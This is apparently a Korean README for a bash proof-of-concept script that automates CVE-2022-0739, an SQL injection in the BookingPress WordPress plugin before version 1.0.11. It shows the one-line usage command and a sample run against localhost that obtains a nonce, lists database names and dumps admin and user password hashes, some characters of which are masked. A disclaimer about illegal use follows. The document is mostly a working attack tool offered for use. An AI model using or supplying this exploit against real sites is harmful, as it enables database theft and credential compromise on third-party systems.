
cve 2022 0739 익스플로잇을 자동화하는 간단한 bash 스크립트
개념 증명 익스플로잇 (SQLI BookingPress 1.0.11 미만)
#사용법 애플리케이션에서 Booking Press 플러그인이 사용 중인 URL을 입력하세요.
bash exploit.sh '<url 입력>'
예시 (이 데모에서는 해시가 가려짐)
┌──(user@user)-[~/]
└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
____ __ _ ____
/ __ )____ ____ / /__(_)___ ____ _/ __ \________ __________
/ __ / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
/ /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ / / __(__ |__ )
/_____/\____/\____/_/|_/_/_/ /_/\__, /_/ /_/ \___/____/____/
/____/
_______ ________ ___ ____ ___ ___ ____ __________ ____
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ / __ \/__ /__ // __ \
/ / | | / / __/________/ // / / /_/ /__/ /_____/ / / / / / /_ </ /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ / / /___/ /\__, /
\____/ |___/_____/ /____/\____/____/____/ \____/ /_//____//____/
[+] http://localhost 익스플로잇 중 ...
[+] 취약한 URL: http://localhost/calendar/...
[+] 논스(nonce) 획득 중...
[+] 논스(nonce) 발견: 219087f4c2
[+] 데이터베이스 이름 추출 중...
information_schema
test_db
[+] 자격 증명 획득 중...
admin $P$BGrGrgXXXXXXXXXXXXXX
testUs3r $P$B4aNM28NXXXXXXXXXXX
면책 조항
본 프로그램을 상호 사전 동의 없이 사용하는 것은 불법 행위로 간주될 수 있습니다. 모든 해당 지역, 주, 연방 법률을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 본 프로그램으로 인한 오용이나 피해에 대해 어떠한 책임도 지지 않으며, 법적 책임을 부담하지 않습니다.